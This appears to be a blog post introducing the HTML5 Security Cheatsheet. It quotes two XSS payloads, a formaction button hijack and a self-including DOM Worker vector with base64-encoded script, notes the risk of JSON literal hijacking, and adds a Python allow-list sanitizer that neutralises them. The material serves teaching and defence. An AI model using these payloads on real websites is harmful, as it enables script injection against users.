
HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, a nice collection of XSS payloads, each with a short explanation of the browser feature it abuses.

For example:

XSS via formaction – requiring user interaction (1)
A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form:

    <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself, causing script execution:

    0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))

Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input, there's a risk of allowing auto-harvesting of values from later object members.
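As an added, defensive illustration (not code from the cheatsheet or from this post): an allow-list sanitizer built on Python's standard html.parser that neutralises the two vectors quoted above by dropping the form/formaction attributes, javascript: and data: URLs, and <script> bodies. The element and attribute allow-list is my assumption of what a comment field might need.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allow-list of elements and the attributes each may keep (assumed for a comment field).
# "form" and "formaction" are left out deliberately: HTML5 lets a <button> outside a form
# bind to it with form="id" and redirect the submission with formaction, which the
# formaction vector above abuses.
ALLOWED = {"p": set(), "b": set(), "i": set(), "a": {"href", "title"},
           "form": {"id", "action", "method"}, "button": {"type", "name", "value"}}
URL_ATTRS = {"href", "action"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" covers relative URLs
RAW_TEXT = {"script", "style"}                   # their bodies are never emitted

def safe_url(value: str) -> bool:
    # Browsers ignore whitespace/control bytes inside a scheme ("java\tscript:"),
    # so normalise before inspecting it. Rejects javascript: and data: URLs.
    return urlparse(re.sub(r"[\x00-\x20\x7f]", "", value)).scheme.lower() in SAFE_SCHEMES

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skipping = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT:
            self.skipping += 1          # swallow <script>...</script> wholesale
        elif tag in ALLOWED and not self.skipping:
            kept = []
            for name, value in attrs:   # HTMLParser hands values already unescaped
                value = value or ""
                if name in ALLOWED[tag] and (name not in URL_ATTRS or safe_url(value)):
                    kept.append(f' {name}="{escape(value)}"')
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in RAW_TEXT:
            self.skipping = max(0, self.skipping - 1)
        elif tag in ALLOWED and not self.skipping:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data))   # anything unrecognised becomes inert text

def sanitize(fragment: str) -> str:
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Run against the formaction vector the output is `<form id="test"></form><button>X</button>`, so the button can no longer reach out of the form or carry a javascript: target.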
